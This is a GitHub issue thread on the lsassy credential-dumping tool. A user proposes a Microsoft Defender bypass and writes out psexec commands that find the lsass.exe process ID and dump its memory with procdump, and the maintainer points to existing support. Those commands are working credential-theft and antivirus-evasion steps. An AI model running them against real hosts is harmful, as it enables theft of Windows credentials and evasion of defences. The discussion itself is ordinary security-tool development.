### ISSUE TITLE
Bypass antivirus

### ISSUE THREAD

**Issue by viaccoz** [Hackndo/lsassy#47]
Under certain circumstances (e.g. Microsoft Defender active), no dump can be performed with lsassy. This is due to the fact that the dump of the lsass.exe process is considered.

However, the following works:
```
$ psexec.py host.example.com 'tasklist /fi "imagename eq lsass.exe"'
[CUT]
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
lsass.exe                     1337 Services                   0     49,680 K
[CUT]
$ psexec.py -c procdump64.exe host.example.com '-accepteula -ma 1337 c:\lsass.dmp'
[CUT]
[01:23:45] Dump 1 initiated: c:\lsass.dmp
[CUT]
```

I don't know whether it would make sense for you to include this bypass in lsassy?

Thanks for your awesome work! :)

**Comment by mpgn** [comment]
"secret technique"

**Comment by Hackndo** [comment]
Hey there,
Thanks for this issue. I would need some details though. I'm not sure I understand how this is different from what lsassy actually does. 
Maybe I missed something?

**Comment by Hackndo** [comment]
This technique is described here
https://github.com/Hackndo/lsassy/wiki/Lsassy-Advanced-Usage#procdump-method

**Comment by viaccoz** [comment]
Hello,

This technique first reads the process ID of lsass.exe and then dumps the lsass.exe process based on its process ID.

If you directly dump lsass.exe (instead of using its process ID), as lsassy does, it is blocked by some products. I could see this behavior with Microsoft Defender.

**Comment by Hackndo** [comment]
Yes, this is what is used by lsassy with procdump method.
https://github.com/Hackndo/lsassy/blob/master/lsassy/modules/dumper.py#L207

**Comment by viaccoz** [comment]
I've tried it again on a lab with Defender. No idea what I did, it works. Sorry!
